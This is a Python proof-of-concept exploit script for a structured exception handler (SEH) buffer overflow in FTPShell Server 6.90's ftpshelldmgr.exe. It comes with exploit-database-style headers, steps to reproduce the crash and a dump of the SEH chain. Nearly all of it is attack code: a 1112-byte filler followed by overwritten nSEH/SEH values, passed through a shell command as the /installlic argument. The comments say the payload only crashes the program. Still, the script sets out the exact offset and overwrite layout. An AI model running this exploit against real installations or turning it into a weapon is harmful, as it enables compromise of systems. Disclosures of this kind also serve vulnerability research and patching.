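#!/usr/bin/python
# Exploit Title: FTPShell Server 6.90 (ftpshelldmgr.exe)- Buffer Overflow (SEH)(PoC)
# Exploit Author: Saeed reza Zamanian
# Date: 2020-07-01
# Vendor: Code Origin
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadserver.htm
# Version: 6.90 Release Date : Jan 31, 2020
# Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC
# Tested On: Windows Vista SP2 -- build 6002 32-bit
#
# Replicate Crash:
# 1) Download, Install, the application
# 2) Execute the exploit (with administrative permissions)
# 3) Crash with SEH Overwrite
#
# You can also use "/installlic {PAYLOAD}" in arguments field in your debugger (immunity or olly)
# SEH chain of main thread
# Address    SE handler
# 0020FBFC   43434343
# 42424242   *** CORRUPT ENTRY ***

import os

# Installation directory of FTPShell Server. The backslashes are doubled so the
# runtime value is identical to the original literal without relying on the
# unrecognised escapes '\P' and '\F' (a SyntaxWarning on newer interpreters).
directory = 'C:\\Program Files\\FTPShellServer\\'  # default
# directory = 'C:\\Program Files (x86)\\FTPShellServer\\'  # directory_for_x64

# Crash input layout, matching the SEH chain dump in the header: 1112 bytes of
# filler reach the exception registration record, the next four bytes land in
# the next-SEH pointer (0x42424242) and the following four in the handler
# pointer (0x43434343). The buffer contains only these marker bytes; the PoC
# demonstrates that the record is overwritten with controlled values and
# produces a crash, nothing more.
offset = '\x41' * 1112
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'
payload = offset + nSEH + SEH

try:
    print("[+] Creating %s sending evil payload." % len(payload))
    # The licence-install argument is handed to the manager binary from its own
    # directory via the shell, exactly as in the original; the header notes the
    # process must run with administrative rights.
    comm = 'cd ' + directory + ' && ftpshelldmgr.exe /installlic ' + payload
    # The context manager closes the pipe and reaps the child instead of
    # leaving the stream open until interpreter exit.
    with os.popen(comm) as stream:
        output = stream.read()
    print("[+] payload sent!")
except OSError as exc:
    # Narrowed from a bare `except:` so programming errors are not hidden, and
    # the reason for the failure is reported instead of being swallowed.
    print("Failed. %s" % exc)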